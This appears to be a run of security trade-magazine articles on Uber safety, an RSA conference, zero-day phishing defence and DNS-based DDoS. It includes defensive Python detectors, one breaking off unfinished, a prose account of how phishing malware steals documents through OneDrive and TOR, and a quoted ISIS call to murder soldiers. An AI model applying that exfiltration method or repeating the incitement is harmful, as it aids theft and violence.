Insurance - A number of comments have been made about insurance, but with a million rides a day I still have not seen any cases where a passenger has been injured and not received the insurance they would have been entitled to riding in a taxi. The situations in which a business person would ride in a vehicle with a driver who is not professionally licensed are numerous: when visiting a foreign city a customer provides one of their staff to drive you around; you organise a tour from a vendor on the street and have them pick you up from your hotel to see the sights for the day; a local friend picks you up to take you to dinner. In all of these cases comprehensive travel insurance would have you covered, and it would equally apply to you sitting in the back of an Uber.

Incident response - If an incident occurred to a traveller in a foreign country while riding in a local taxi, it would be extremely difficult for a corporate security professional to respond immediately. We would have to try to identify which taxi company was used, whether it is centrally controlled, find a contact number and likely battle through a language difference. With Uber I can call its security team and ask for assistance; with Uber increasingly concerned about its global reputation, I am confident it would take all necessary steps to assist us.

Background checks - Background checks are inherently flawed as a single layer of defence. Edward Snowden was cleared for access to the top secrets of the US Government, but this did little to prevent him from sharing them with the world. A simple legal name change will defeat the majority of background checks undertaken by private companies. Background checks also differ in their effectiveness by location. For example, police in India do not have a central criminal database, so you might have to undertake checks with multiple independent police services to accurately determine an individual's criminal history. Uber does undertake background checks, as do most taxi companies, but increasing the frequency of such checks does not necessarily lead to a safer driver. Additionally, every jurisdiction in the world has different rules for who can access criminal convictions and when such convictions are wiped or not recorded. Regardless of the checks being conducted, you are always taking a risk when sharing a vehicle with any person you do not know personally.

Rating - Uber drivers are aware that each of their passengers rates their driving and their service. Most taxi drivers are aware that it is difficult for passengers to report misbehaviour, poor driving or rudeness; for a foreign traveller, working out how to report a taxi driver is almost impossible. Over time those Uber drivers who fail to adhere to road rules or act inappropriately will be rated poorly and banned from driving. Conversely, taxi drivers know their behaviour is rarely reported, and it will take a significantly longer period for them to be identified and for action to be taken. It is well known that some taxi drivers specifically target foreigners; Uber's rating system puts everyone on an equal playing field.

Overall, Uber provides a safer alternative than most taxi services. Of course, trusting your safety to an unknown individual will always come with risks: staying in a hotel where numerous unknown staff have 24-hour access to your room, letting the delivery driver into your home to place a heavy box in the kitchen, providing spare keys to an Airbnb guest who has plenty of time to nip away and cut another set, paying good money to be locked in a room with a stranger and just a towel for a massage, and of course jumping in a car for a ride, be it a taxi, an Uber or a friend of a friend. There may be particular cities or states around the world where the local taxi service is tightly regulated and provides significant safety features, but Uber is a global provider and should be treated as such. With many businesspeople travelling to multiple cities across the world, often for short durations, examining each of the myriad local transport options and comparing safety features is not viable. Uber provides a good level of safety globally, and this is a boon for travellers.

The author has no affiliation with any ride-service provider or taxi authority.
It’s all about cyber security
By Sarosh Bana
The threat to cyber security is mounting even as the technology landscape transforms across the world, with some of those either within or outside the organisation manipulating the changing technologies to their advantage. The shift towards software-defined networks, cloud infrastructures and smartphones replete with apps has added complexity, as systems appear increasingly vulnerable to web threats and frauds that are only increasing in number and sophistication. The profitability of cybercrime is transforming the nature of the game. And in its relentless quest to stay ahead of the fraudsters, cybercrime intelligence the world over is evolving ever newer tools to counter the changing threat landscape of internet fraud and crime, in an effort to safeguard official and personal data and information.

Mindful of these challenges, Amit Yoran, the President of RSA, The Security Division of EMC Corporation, both headquartered in Massachusetts, has issued a clarion call to adopt faster detection and response to end the "vicious cycle" of prevention and remediation. Addressing government and private industry cybersecurity experts in Singapore at the recent RSA Conference Asia Pacific & Japan (RSAC APJ), the RSA chief urged companies and governments to rethink their traditional approaches to cyber defence as they increasingly turn to mobile and cloud technologies to store and access data and systems.

This third APJ edition of the annual RSA Conference, the world's leading information security symposium and exposition, elicited a record turnout of over 4,900 registrants, a 50 per cent increase from 2014, attending 60 track sessions, keynotes and tutorials featuring more than 90 speakers. The track sessions were split across seven tracks: Cloud and Data Security, Cybercrime and Law Enforcement, Governance and Risk Management, Mobile Security, Security Infrastructure, Threats and Threat Actors, and Sponsor Special Topics. The Conference also saw more than 90 exhibitors and sponsors, an increase of 35 per cent over 2014. Participating companies included Cisco Systems, the Australian Strategic Policy Institute (ASPI), Fortinet, Barracuda, MITRE, Certes Networks, Ernst & Young, Akamai and RSA, which showcased the latest technologies designed to secure and protect organisations against cyber threats. The closing keynote address was delivered by Kailash Satyarthi, the Indian national who won the Nobel Peace Prize in 2014 for his children's rights advocacy and activism.

Yoran discussed how the rapid growth of mobile and cloud technologies presents a boon to organisations and industries, but also a significant threat to their legacy security operations. As mobile and cloud technologies decentralise organisations' digital environments, the perimeter on which traditional cyber defences are based is disappearing. "Despite the disappearing perimeter, businesses around the world continue to rely primarily on perimeter protection technologies like firewalls, anti-virus, and intrusion detection systems to prevent breaches, only to see those tools invariably fail under the onslaught of today's advanced attacks," Yoran said. "Compounding that failure is the current practice of relying on SIEM and other signature-based tools that require historical experience to detect advanced threats, which oftentimes have no precedent." He added that this combination of antiquated technologies and misguided practices is the root of the vast majority of today's security failings. Yoran concluded by reminding the audience that the technologies already existed for companies to move to a more effective approach to security, focused on faster detection and response to security threats. What was lacking was the will. "This is not a technology problem," he said. "This is a mindset problem."

Citing nation-state attackers as the biggest challenge to internet security today, RSA's Chief Technology Officer, Dr Zulfikar Ramzan, remarked, "The good news is that they are still relatively few." Ramzan, who works out of Santa Clara, California, said that attackers were generally getting more sophisticated, and what was considered a sophisticated attack five years ago was today viewed as a mainstream one. Enhancing preventive measures was at times no use, he said, because good adversaries would find ways around them. The issue was often not that a major breach had occurred, but getting to know the full scope of the breach and what happened from that point onward, he averred. The key to managing these incidents was getting knowledge of them in time to contain their impact, he added. He maintained that this was a problem area that more vendors were addressing, and more companies needed to think about.

Indicating that most of the recent data breaches were compromises of legacy IT systems and not of cloud services, Ramzan maintained, "We need to get over the idea that cloud is somehow inherently insecure, for it may actually be more secure for your needs." He pointed out, however, that though it was cheaper and more efficient for the cloud provider to secure the infrastructure for all its customers than for each individual company to handle security itself, there were still issues cloud providers needed to improve. "They need to provide customers visibility and control for data governance, as well as to help understand compliance risk," he said.

The departure from perimeter-defined security was a key theme at the RSA Conference, and Munawar Hossain, director of product management for data centre security and content security at California-based networking giant Cisco Systems, Inc., said that the state of data centre security had also evolved from the paradigm of a self-contained operation with a well-defined perimeter. "The data centre has evolved in three distinct ways: the aspect of virtualisation, the dependence of the data centre on optimised resources, and the dependence on services not housed in the data centre," he noted. Stephen Dane, Cisco's Hong Kong-based managing director for Security for APJ and Greater China, said it was no longer a matter of "if" cyber attacks would happen, but "when" and "how". "Security concerns everyone in a business environment, and is now a persistent business risk," he noted. "Many companies are still underserved by point product solutions that lack continuous advanced threat protection, and it is not unusual to find organisations with 40 or more different security solutions that don't and can't work together." Attackers were taking advantage of the gaps in visibility and protection. According to him, not only did security need to evolve to meet new demands, but a new approach to security was also required.

Dr Tobias Feakin, Senior Analyst, National Security, and Director, International Cyber Policy Centre, at the Australian Strategic Policy Institute (ASPI), based in Barton in the Australian Capital Territory, explored the concept of cyber-maturity, noting that Asia-Pacific countries had
different levels of security understanding and readiness. "The Asia-Pacific region was home to some of the 'least networked' as well as the 'most networked' countries," he remarked. "Australia has a more mature conversation around national security threats, for example."

Web-based fraud is a growing problem in Asia-Pacific. IBM Security's George Tubin described how the Dyre malware family combined phishing and malware to steal login credentials for online banking systems and then initiated wire transfers for large amounts of money. His colleague, Tal Darsan, gave details about Tsukuba, a banking Trojan which specifically targeted Japanese Facebook users and customers of 20 Japanese financial institutions. Organisations should quantify and prioritise the risks associated with customer web sessions and transactions, the speakers said.

Feakin discussed how organisations could apply cyber-maturity concepts, such as looking at how growth in the digital economy in the Asia-Pacific affected potential growth, and identifying risks. "When making policy decisions, look beyond your usual horizons and try and assess how they will be affected by political trends, legislation, and societal considerations," he recommended.

Referring to a spike over the past five months in offensive cyber activities by groups claiming association with the Islamic State, or ISIS, Feakin indicated that the Twitter and YouTube accounts of the United States Central Command (CENTCOM), a theatre-level Unified Combatant Command responsible for US security interests in 20 nations stretching through the Arabian Gulf into Central Asia, were suspended in January after CyberCaliphate, a group claiming to support ISIS, had hacked into both, defacing them with pro-ISIS messages. "While the hacks had no direct impact on CENTCOM's operations, they were certainly embarrassing and akin to acts of 'hacktivism' we've seen from groups like Anonymous," he mentioned. "In February, the same group hacked into Newsweek and, of all things, Taylor Swift's Twitter account, defacing both with pro-ISIS messages and sending threatening messages to US President Barack Obama."

In March, a group claiming to be the IS Hacking Division published on JustPaste.it a list of photos, names, addresses and branch of service of US service personnel, which it claimed was taken from US military data servers. Accompanying the data was a statement from the group: "With the huge amount of data we have from various different servers and databases, we have decided to leak 100 addresses so that our brothers in America can deal with you…kill them in their own lands, behead them in their own homes, stab them to death as they walk their streets thinking that they are safe."

The most significant effort was in April, when the French channel TV5Monde experienced a complete three-hour blackout and all its 11 channels, along with its website and social media outlets, were hacked. While the attack was on, the hackers placed documents on TV5Monde's Facebook page that they claimed were identity cards and CVs of relatives of French soldiers involved in fighting ISIS, accompanied by threats against the troops themselves. The IS Hacking Division again claimed responsibility. "What this attack illustrated was the group's increased degree of sophistication," noted Feakin. "There had clearly been an amount of pre-attack planning, including a degree of social engineering, that had gone on in order to completely shut down the station's computer systems."

Dr Irving Lachow, Principal Cyber Security Engineer with MITRE Corp. in McLean, Virginia, pointed out that the trend towards smart cities across the world was giving rise to a new set of security concerns. The idea of smart cities was gaining a lot of traction in the Asia-Pacific, with the Digital India campaign and Singapore's Smart Nation initiative as notable examples. In this regard, governments were building out information technology and communications infrastructure to effectively and efficiently deliver services such as governance, education, healthcare, housing and mobility to their peoples. "Smart cities represent the risks posed by the Internet of Things on a large scale, as the attack surface is huge and complex," he observed, adding that cyber-criminals could target traffic control sensors, telecommunications, financial services, water supply systems, electricity grids and the varied databanks. MITRE is a not-for-profit organisation that operates research and development centres sponsored by the US federal government.

Lachow, who had been the principal adviser to Robert Butler, former US Deputy Assistant Secretary of Defense for Cyber Policy, said the elements needed to build digitally secure and safe cities included a comprehensive privacy policy, increased awareness among citizens of digital threats, deployment of security technologies and dedicated cybersecurity teams, and effective public-private partnerships. Despite the high levels of interest, smart nations and smart cities were still in their early stages.

Yoran mentioned that while the cyber security industry does not have all the answers and still faces resource challenges, skill gaps and legal constraints, it was on the path to changing a paradigm under which it has operated for decades. "As an industry, we are on a journey that will continue to evolve in the years to come through the efforts of all of us," he said.
ENTERPRISE AGILITY OBTAIN COLLECTIVE INTELLIGENCE AT THE FSI LEADERS SUMMIT
JOIN US IN SYDNEY How is your organisation adapting to digital; what is your mobile strategy? The FSI Leaders Summit will influence discussion around enterprise agility in today's constantly evolving workplace within the financial sector. The Summit is invitation only and intended for Australia's most senior financial leaders, including CIOs, CTOs, Heads of Technology, SVPs and many more, to gather for a strategic two-day event in order to exchange knowledge and interact as one over a range of important issues facing the industry.
SEPTEMBER 16 - 17, ANZ STADIUM, SYDNEY WWW.FSILEADERS.COM
FURTHER SUMMIT TOPICS INCLUDE: CYBER SECURITY, DIGITAL, MOBILITY, BIG DATA, ANALYTICS, STORAGE, PAYMENTS
For more information contact Tyron McGurgan e. tyron@mediacorpinternational.com.au
www.mediacorpinternational.com.au p. 02 8188 8508
BAE Systems Applied Intelligence Feature
The changing threat landscape: the rise of the Zero-Day attack and how to prevent them

New data breaches are uncovered almost daily, any one of which can jeopardise your company, place your intellectual property at risk, and cause monetary and reputational damage in minutes. Cyber criminals are increasingly aggressive, well-funded and persistent, and these days no company can ever be perfectly safe from the most determined attackers.

As the threat landscape continues to evolve and malware detection becomes more advanced, cyber criminals are forced to create ever more sophisticated and specialised malware. As traditional signature-based anti-virus scanners evolved into combined signature-based and heuristic-based malware scanners, the amount of spam and viruses caught by signature alone has reduced, but the total amount of malware has increased. In 2005, seven 'families' represented 70 per cent of all malware activity, and the dominant threats were mass-mailing 'worms' with backdoor capability, alongside Nigerian email scams. In 2014, 20 'families' represented 70 per cent of all malware activity, with today's malware much more sophisticated and unique, including stealthy command-and-control botnet membership, credential theft, and often some form of fraud such as bitcoin mining. And now, with 70 to 90 per cent of malware unique to any single organisation, the most difficult attacks to defend against are Zero Day attacks: attacks that are unknown or have not previously been seen and therefore cannot be recognised and blocked by their 'signature'.

Email is the single most important entry point for malware insertion, as it is the centrepiece of business communications and is the most common egress and ingress point for information within most companies. It is also the single most important entry point for targeted attacks, spear phishing, 'longline' phishing and advanced zero day exploits. In fact, 95 per cent of cyber attacks start with an email message. 'Phishing' campaigns mostly exploit publicly known vulnerabilities (CVEs). These attacks can spread through an organisation like wildfire, with 75 per cent of attacks spreading from victim 0 to victim 1 within 24 hours, and 40 per cent of attacks hitting a second organisation in less than one hour.
The challenge

As malware evolves, traditional anti-virus software is struggling to cope. For example, sophisticated malware can now recognise when it is being 'sandboxed' by looking for files associated with the sandbox environment. Companies need a strategy that reduces their security exposure and protects them from reputational damage and intellectual property theft by cyber threats, with fast and effective attack detection, containment and response.

The technology solution

Companies need a strategic systems approach to protect against today's evolving cyber threats. A systems approach requires multiple layers of technology that help protect an enterprise at every phase of the Kill Chain. These components work together as cooperative, compensating controls to interrupt attackers as they attempt to move from one phase to the next. These technologies apply before an attack succeeds (pre-exploitation) and afterwards (post-exploitation).

Pre-exploitation: interrupting the delivery phase

• Email security: Strong, redundant anti-virus and anti-spam engines, with controls to throttle high-volume senders and detect directory brute-forcing (directory harvest attacks that probe for valid addresses)
• Web security: Inline web security filters to prevent visits to sites that are known to, or are likely to, host malware used in attack campaigns
• Zero Day prevention: Heuristics, analytics and sandboxing to stop targeted attacks, spear phishing, 'longline' phishing and advanced Zero Day exploits that anti-virus and anti-spam controls cannot detect

Post-exploitation: interrupting the command-and-control and actions-on-objectives phases

• IDS/IPS: Monitoring and analysis of complex network traffic in real time; blocking of malicious internal traffic and sophisticated attacks that cannot be prevented with firewalls alone
• Security information and event management (SIEM): 24 x 7 monitoring of critical devices on the network by a trained security team
• Log management: Regular reviews of security logs from critical devices to understand security events across the network, detect suspicious activity and respond quickly to prevent malicious attacks
• Insider threat prevention: Content-aware policy filters to ensure that sensitive and protected information stays inside the organisation, where it belongs

A systems approach connects the dots, and those connections ensure that information gets into the hands of those who need it as quickly as possible, whether that is a system component or a human being.
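The two email-security controls listed above, throttling high-volume senders and detecting directory brute-forcing, come down to per-client counting over a sliding window. The following is an added example, not BAE Systems code, that runs that logic over a constructed, simplified key=value SMTP log (not a real MTA format); the window and thresholds are assumed values a mail team would tune for its own traffic.

```python
"""
Added example (not BAE Systems code): detection logic for two of the email-security controls above,
a directory harvest attack (probing many addresses to find valid ones) and a high-volume sender.
Input is a constructed, simplified key=value SMTP log, not a real MTA format. Thresholds are assumed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+) smtpd: client=(?P<ip>[\d.]+) rcpt=(?P<rcpt>\S+) status=(?P<status>accept|reject)"
    r"(?: reason=(?P<reason>\S+))?$"
)

def parse(line):
    """One log line -> dict with a datetime, or None if the line is not in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev

def analyse(lines, window=60, dha_rejects=5, dha_ratio=0.8, volume=20):
    """Sliding-window analysis per client IP. Returns {ip: sorted list of alert names}."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, was_unknown_user_reject)
    alerts = defaultdict(set)
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue                # unparseable lines are skipped, not counted
        q = recent[ev["ip"]]
        q.append((ev["ts"], ev["status"] == "reject" and ev["reason"] == "unknown_user"))
        while (ev["ts"] - q[0][0]).total_seconds() > window:
            q.popleft()             # forget events that fell out of the window
        attempts = len(q)
        rejects = sum(1 for _, r in q if r)
        # Directory harvest: many unknown-recipient rejections and almost nothing else
        if rejects >= dha_rejects and rejects / attempts >= dha_ratio:
            alerts[ev["ip"]].add("directory_harvest")
        # High-volume sender: throttle candidate regardless of whether its mail is accepted
        if attempts >= volume:
            alerts[ev["ip"]].add("high_volume")
    return {ip: sorted(a) for ip, a in alerts.items()}

def build_sample_log():
    """Constructed sample: one harvester, one normal sender who mistypes an address, one bulk sender."""
    def line(sec, ip, rcpt, status, reason=None):
        s = f"2015-09-01T10:00:{sec:02d} smtpd: client={ip} rcpt={rcpt} status={status}"
        return s + (f" reason={reason}" if reason else "")
    log = []
    # 203.0.113.5 walks a dictionary of first names; 7 of its 8 recipients do not exist
    names = ["aaron", "adam", "alice", "amy", "andrew", "anna", "anthony", "sales"]
    for i, n in enumerate(names):
        ok = n == "sales"
        log.append(line(i * 3, "203.0.113.5", f"{n}@example.com",
                        "accept" if ok else "reject", None if ok else "unknown_user"))
    # 198.51.100.7 writes to two colleagues and mistypes one address: no alert
    log += [line(5, "198.51.100.7", "sales@example.com", "accept"),
            line(6, "198.51.100.7", "saless@example.com", "reject", "unknown_user"),
            line(9, "198.51.100.7", "info@example.com", "accept")]
    # 192.0.2.9 is a legitimate but noisy bulk sender: 20 accepted messages in 40 seconds
    log += [line(i * 2, "192.0.2.9", "info@example.com", "accept") for i in range(20)]
    return sorted(log)   # ISO timestamps at the start of each line sort chronologically

if __name__ == "__main__":
    for ip, names in analyse(build_sample_log()).items():
        print(ip, ", ".join(names))
```

The ratio test is what keeps the typo-prone but legitimate sender out of the harvest alert: a handful of unknown recipients among normal traffic is ordinary, a run of nothing but unknown recipients is a dictionary walk. The bulk sender trips only the volume alert, which is the input to throttling rather than to blocking.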
The people solution

The most insecure parts of any security infrastructure are the living, breathing human beings tapping on keyboards. Intentionally or not, we all make mistakes now and then. Phishing emails can masquerade as friends, or as a popular retailer or business. Phishing emails cloak their origins by using masked URLs that only reveal the true URL if you hover your mouse over the link. Ultimately, phishing emails are designed to induce recipients to 'click' and visit malicious destinations controlled by the attackers. Phishing emails are hard to stop unless recipients are vigilant. While there are numerous tipoffs a user can employ to detect a phishing scam, employees must be trained to recognise them.
How to spot a ‘phish’
It’s not always straightforward, but there are a few steps employees can take to avoid being drawn in by a phish.
1. Looking for misspelled words and lousy grammar: Hackers are notoriously bad spellers. Some marketers are too, so a typo-laden email is not always a phish, but it’s a good tipoff.
2. Looking before they click: Before clicking, hover over a link to make sure it goes to the site you think it does. Often, a phishing email will spoof the URL of a well-known brand - or just camouflage a nasty IP address under that URL.
3. Only opening the familiar: If employees receive emails from people they don’t know, or offers from companies they never subscribed to, they shouldn’t open them. And if you do open them, don’t click any links.
4. Paying attention to ‘link bait’: Attackers want victims to click on their links and will exploit every human failing to get them to do it. The more strongly an email appeals to employees’ curiosity, charity, urgency, prurience or vanity, the more likely it is to be a phishing attack.
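Tip 2 above can be automated at the mail gateway. The following is an added example written for this page (it is not code from the article or from BAE Systems): it parses the HTML body of a message and flags each link whose visible text names one domain while the href points at another, and each link whose target host is a raw IP address. The sample email, the domain names and the regular expression are constructed for the illustration; the registrable-domain comparison uses the last two labels only, since no public suffix list is available offline.

```python
"""Flag the link tricks described above in an HTML email body (added example)."""
import re
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Matches something that looks like a host name inside the visible link text.
DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


def _host(value):
    """Lower-cased host of a URL or bare domain; '' if there is none."""
    parsed = urlparse(value if "://" in value else "http://" + value)
    return (parsed.hostname or "").lower()


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _registrable(host):
    """Crude comparison key: last two labels (no public suffix list offline)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html):
    """Return (href, text, reason) for each link that fails the two checks."""
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = _host(href)
        if not target:                      # mailto:, javascript:, relative links
            continue
        if _is_ip(target):
            findings.append((href, text, "raw IP address in link target"))
            continue
        shown = DOMAIN_RE.search(text)
        if shown:
            shown_host = _host(shown.group(1))
            if _registrable(shown_host) != _registrable(target):
                findings.append((href, text,
                                 f"text shows {shown_host} but link goes to {target}"))
    return findings


# Constructed sample: one spoofed brand URL, one IP-address link, one honest link.
SAMPLE_EMAIL = """<p>Your account was locked. Please sign in at
<a href="http://login.examp1e-bank.co/session">https://www.example-bank.com/login</a>
or <a href="http://203.0.113.7/verify">click here</a>.
<a href="https://www.example-bank.com/help">Help centre</a></p>"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print(f"{reason}: '{text}' -> {href}")
```

Links whose visible text is plain prose ("click here") cannot be checked for a text/target mismatch, which is why the IP-address check runs first and independently.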
Protecting against zero day attacks
BAE Systems’ Zero Day Prevention leverages leading-edge statistical analysis techniques, static and dynamic analysis, machine learning and innovative exploit detection sandbox techniques that analyse unknown objects with malware engines while applying advanced techniques to detect and prevent attacks, even without signatures. It:
1. Stops sophisticated threats, including Zero Day Attacks and Advanced Persistent Threats
2. Arms CIOs and IT managers with new, comprehensive detection techniques to reduce their company’s attack surface and vulnerabilities
3. Provides protection at the time of click through real-time detect and block capabilities by rewriting URLs
4. Uses ‘in-line’ inspection and prevention techniques to stop payloads before delivery
5. Inspects all known and emerging malware contained in messages, headers, metadata, links, and all potentially malicious attachment types, and returns minimal false positives
6. Provides a holistic view of incoming threats, so they can be rapidly assessed, evaluated and acted on by human analysts. If one component detects something, it alerts the other components. Putting everything under the same watchful eyes protects assets and helps a company understand the risks more acutely
7. Addresses the entire ‘kill chain’ by providing companies the support and intelligence they need, when they need it
Cyber security is no longer just about keeping the lights on – businesses need to protect their corporate IP, their reputation, and keep the trust of customers, investors and the public. By developing a partnership with their supplier and combining that with ongoing training of staff, companies can increase their understanding of the threat landscape, and where they can’t prevent each and every attack from happening, they can increase their chances of dealing quickly and effectively with an attack, thereby minimising detrimental outcomes.
Anatomy of a phishing attack
So what are the stages of a ‘phishing’ attack and how does it work?
1. Spear-phish email with link: Compromised enterprise servers are used to send the emails. This has the advantage of bypassing reputation-based spam detection filters as well as tricking the recipient with a recognisable sender domain.
2. Malware delivery: The email asks the victim to click a link. These links send the recipients to compromised websites hosting zip files containing the malware payload.
3. Malware ‘Command and Control’ (HTTPS): Once the payload is downloaded and executed, the malware communicates over HTTPS to a compromised server hosting a PHP script which provides a gateway to a custom task/log database file.
4. Victim information and tasking: The attackers access the Command and Control (C&C) server through the same gateway script. They can then retrieve logs of victims connecting back to the server, and add tasks which the malware retrieves. This can include general tasks like password stealing or taking screenshots, but also arbitrary commands and scripts to execute.
5. Document exfiltration: The attackers then extract the documents from their location. Often, they make use of the cloud storage service OneDrive (part of Microsoft’s Live service). The VBS script adds OneDrive as a mounted drive, moves the stolen documents there (where they are synchronised with the cloud), and then un-mounts the drive.
6. Document retrieval: Using OneDrive is beneficial as it is free and anonymous for the attacker to set up, but also unlikely to be blocked from enterprise networks and has encryption by default. Once the stolen documents are synced with OneDrive, the attackers can log in and quickly retrieve the stolen data through an anonymous internet service such as TOR.
Sanjay Samuel General Manager APAC, BAE Systems Applied Intelligence
The best ways to fend off DDoS attacks By Martin Ryan
When Australia’s largest wireless broadband provider Cirrus Communications suffered a distributed denial of service (DDoS) attack in July 2014, the attack had hit Cirrus’ core network, rather than the radio equipment on the edge, knocking out half of its network. Following the incident, the broadband provider admitted that it had experienced “struggles” in the wake of the event, and further reports suggested that the attack had disrupted communications to other carriers that use Cirrus’ services.
It would be naïve to think that DDoS attacks are rare. In fact, many reports indicate the opposite. According to BT Global Services, 64% of Australian organisations were hit by DDoS attacks in 2014, which was the highest out of all 11 geographical areas measured in the report. Not only are DDoS attacks common, the ones seen in Australia are shorter and more aggressive. According to ARBOR Networks the attack length in Australia during the first quarter of 2015 was 22 minutes, versus 46 minutes in Asia Pacific (APAC). The average DDoS attack was 1.25 Gbps, compared with the APAC average of 483.65 Mbps—a dip from the last quarter of 2014 where the average DDoS attack in Australia was 1.34 Gbps and the average APAC attack size was 500.68 Mbps.
Considering the statistics, organisations should already have a solid plan in place to counteract such attacks, but in reality, only 24% of Australian organisations said that they have sufficient resources in place to counteract a DDoS attack, according to the same BT Global Services report.
It Pays to be Prepared
Due to the growing ease of launching DDoS attacks, the demand for DDoS prevention solutions is also on the rise. IDC has forecast that the worldwide market for DDoS prevention solutions will grow by a compound annual growth rate (CAGR) of 18.2% from 2012 through 2017 and reach $870 million.
DDoS attacks are not only obnoxious to deal with, but they can be a great detriment to your company. Companies that have undergone DDoS attacks have experienced the following:
Loss of income: For ecommerce giants, just a second of downtime could mean thousands in lost revenue. Even if your company isn’t as large as Amazon or eBay, any amount of profit loss due to downtime should be cause for concern. Not only do you miss a potential sale in real time, that customer is less likely to come back and try to purchase from you again in the future. A recent study by Kaspersky Lab and B2B International estimated that a DDoS attack on an organisation’s online resources might cause losses ranging from $52,000 to $444,000.
Brand damage: If potential customers are trying to reach your website and are greeted with an error message, they probably will not immediately assume that the site is under a DDoS attack. They will most likely assume that there is something wrong with the development of the website itself and may feel that it is unreliable, making them less likely to return. Press surrounding DDoS attacks can also paint a bad picture for your brand. If the driving force behind the attack was based on political or moral agendas, your brand could acquire a negative image because it was one of the attacker’s targets.
Loss of customer confidence: Just as your brand image may deteriorate in the public eye, your customers may also lose confidence in your organisation. If you have a web service-based company (think web hosts) and your servers go down due to an attack, all of your customers’ websites go down as well. It can take only a few moments of downtime a year to provoke a customer to move to another service provider.
Personnel cost: The time spent by your personnel to investigate and mitigate an attack can be costly. Time spent by your operations team dealing with an attack only takes away from their regular work. Similarly, your helpdesk will also see an influx of calls and tickets due to questions surrounding access during downtime. All of these extra hours can massively add up over the duration of an attack.
Reducing The Threat of DNS-based DDoS Attacks
Domain Name System (DNS) based DDoS is a common network traffic attack used by malicious attackers to impact business operations and critical IT applications. The attacks are designed to bring down DNS servers and consume network bandwidth, thereby impacting critical IT applications. There are three ways such attacks can happen, and three common techniques used to redirect traffic through compromised DNS servers:
• The first is to perform a cache poisoning attack. Basically, attackers attempt to inject malicious DNS data into the recursive DNS servers that are operated by many ISPs. These DNS servers are typically the “closest” to users from a network topology perspective, so the damage is localised to specific users connecting to those servers. Solution: There are effective workarounds to make this impractical in the wild, and good standards like Domain Name System Security Extensions (DNSSEC) that provide additional protection from this type of attack.
• The second method is to take over one or more authoritative DNS servers for a domain, and change the DNS data. If an attacker were to compromise authoritative DNS, the effect would be global. Solution: Good security practices like strong passwords, two-factor authentication, IP Access Control Lists (ACLs), and good social engineering training are effective at thwarting these attacks.
• The third technique can be the most difficult to undo. The attacker takes over the registration of a domain and changes the authoritative DNS servers. What makes this attack so dangerous is the Time To Live (TTL). Changes of this nature are globally cached on recursive DNS servers for typically 86,400 seconds, or a full day. Solution: Unless operators are able to purge caches, it can take an entire day (sometimes longer) for the effects to be reversed.
The Way Forward
The best way to avoid any disruption from a DDoS attack is to be prepared for it. Talk to your DNS provider and ask about their mitigation techniques, and if you are currently doing everything in-house or are relying on your ISP or a firewall, evaluate your situation. Do you feel confident that what you have in place can successfully mitigate an attack? If you are having a hard time deciding whether or not you actually need to invest in a stronger mitigation technique, figure out the impact it would have on your company financially if it were to happen. Although it may not be an apparent risk, the cost associated with being attacked is usually much higher than the cost to take safeguards. If you are not prepared, then you might have to be prepared to pay for it—significantly.
About the Author
Martin Ryan is the VP Managing Director Asia Pacific at Dyn. He is responsible for leading Dyn’s business strategy in the region as well as increasing the company’s market penetration. Martin holds a postgraduate MBA from the Macquarie University Graduate School of Management and a Bachelor of Electronic Engineering and Bachelor of Business from the University of Technology Sydney.
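The TTL point in the third technique above is easy to under-estimate, so here is an added example (written for this page, not code from the article or from Dyn) that models it. A small recursive-resolver cache serves a record until its TTL expires; the parent zone is represented by a callable that publishes whatever the registrar currently holds. The scenario constructs a registration hijack at t=0 that the registrar reverses ten minutes later, then counts how many hourly queries still receive the rogue name servers, with and without an operator purge. All names, times and the 86,400 s TTL are constructed placeholders chosen to match the article's "full day" case.

```python
"""Why a hijacked delegation outlives its fix: a recursive-cache model (added example)."""
from dataclasses import dataclass

ZONE = "victim.example."                                   # constructed domain
GOOD_NS = ("ns1.dns-provider.example.", "ns2.dns-provider.example.")
ROGUE_NS = ("ns.rogue.example.",)                          # placeholder rogue servers
TTL = 86400                                                # the 'typical' TTL quoted above


@dataclass
class CachedRecord:
    rdata: tuple       # the NS host names
    expires_at: int    # absolute time (seconds) after which the entry is stale


class RecursiveCache:
    """Minimal recursive-resolver cache: one entry per name, honouring TTL."""

    def __init__(self):
        self._entries = {}

    def resolve(self, name, now, authority):
        """Answer from cache while the entry is fresh; otherwise ask the parent
        zone via authority(name, now) -> (rdata, ttl) and cache the answer."""
        hit = self._entries.get(name)
        if hit is not None and now < hit.expires_at:
            return hit.rdata, "cache"
        rdata, ttl = authority(name, now)
        self._entries[name] = CachedRecord(rdata, now + ttl)
        return rdata, "authority"

    def purge(self, name):
        """What 'purging the cache' means: drop the entry so the next query
        goes back to the authority."""
        self._entries.pop(name, None)


def make_authority(events):
    """Parent zone's view: events is a time-ordered list of (time, rdata);
    the latest event at or before `now` is what the registrar publishes."""
    def authority(name, now):
        current = GOOD_NS
        for when, rdata in events:
            if now >= when:
                current = rdata
        return current, TTL
    return authority


def hijack_timeline(purge_at=None):
    """Hijack at t=0 s, registrar restores the real NS set at t=600 s, and one
    resolver queries hourly for 30 hours. Returns (hours during which the
    resolver handed out the rogue NS set, first hour it handed out the good set)."""
    authority = make_authority([(0, ROGUE_NS), (600, GOOD_NS)])
    cache = RecursiveCache()
    rogue_hours, first_good_hour = 0, None
    for hour in range(30):
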